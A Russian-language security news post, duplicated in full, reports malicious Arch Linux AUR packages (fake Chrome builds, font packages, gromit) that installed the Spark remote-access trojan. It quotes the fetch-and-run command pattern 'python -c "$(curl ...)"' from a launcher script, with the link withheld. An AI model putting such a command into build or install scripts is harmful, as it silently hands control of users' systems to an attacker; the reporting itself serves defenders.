 fox
II/IDEC networks :: lor.opennet :: / В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов
|
Login |
[#]
В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов
robot(spnet, 1) — All
2025-08-04 17:44:05
В репозитории AUR (Arch User Repository), были обнаружены пакеты содержащие вредоносный код, интегрированные в пакеты с неофициальными сборками браузеров. В дополнение [ к выявленным две недели ]( https://www.opennet.ru/opennews/art.shtml?num=63604 ) назад трём вредоносным пакетам с браузерами, в AUR был добавлен пакет google-chrome-stable, также [ содержащий изменение ]( https://aur.archlinux.org/cgit/aur.git/tree/google-chrome-stable.sh?h=chrome-bin ) , устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе.
В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда ‘python -c «$(curl
вредоносная ссылка)»’, загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и отправлять скриншоты.
Вредоносный пакет был загружен позавчера и был [ удалён ]( https://lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/GHPZL7D6ASQRCDIJBXBYTVAPJKUN3MJV/ ) администраторами AUR через несколько часов после появления. Почти сразу после удаления этого вредоносного пакета в AUR были загружены два вредоносных пакета - «chrome» и «chrome-bin», содержащие [ аналогичный сценарий ]( https://aur.archlinux.org/cgit/aur.git/tree/google-chrome-stable.sh?h=chrome-bin ) установки вредоносного ПО на систему пользователя.
Следом было выявлено ещё три пакета с вредоносным кодом: [ ttf-mac-fonts-all ]( https://lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/FW7KMQODHEBTIA6QY3VG563KKDLALXGZ/ ) , [ ttf-ms-fonts-all ]( https://lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/N4GYCFBHAAUXT7UFYKRA2EW2OZP6OUJW/ ) и gromit.
https://www.linux.org.ru/news/security/18040993
robot(spnet, 1) — All
2025-08-04 17:44:05
В репозитории AUR (Arch User Repository), были обнаружены пакеты содержащие вредоносный код, интегрированные в пакеты с неофициальными сборками браузеров. В дополнение [ к выявленным две недели ]( https://www.opennet.ru/opennews/art.shtml?num=63604 ) назад трём вредоносным пакетам с браузерами, в AUR был добавлен пакет google-chrome-stable, также [ содержащий изменение ]( https://aur.archlinux.org/cgit/aur.git/tree/google-chrome-stable.sh?h=chrome-bin ) , устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе.
В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда ‘python -c «$(curl
вредоносная ссылка)»’, загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и отправлять скриншоты.
Вредоносный пакет был загружен позавчера и был [ удалён ]( https://lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/GHPZL7D6ASQRCDIJBXBYTVAPJKUN3MJV/ ) администраторами AUR через несколько часов после появления. Почти сразу после удаления этого вредоносного пакета в AUR были загружены два вредоносных пакета - «chrome» и «chrome-bin», содержащие [ аналогичный сценарий ]( https://aur.archlinux.org/cgit/aur.git/tree/google-chrome-stable.sh?h=chrome-bin ) установки вредоносного ПО на систему пользователя.
Следом было выявлено ещё три пакета с вредоносным кодом: [ ttf-mac-fonts-all ]( https://lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/FW7KMQODHEBTIA6QY3VG563KKDLALXGZ/ ) , [ ttf-ms-fonts-all ]( https://lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/N4GYCFBHAAUXT7UFYKRA2EW2OZP6OUJW/ ) и gromit.
https://www.linux.org.ru/news/security/18040993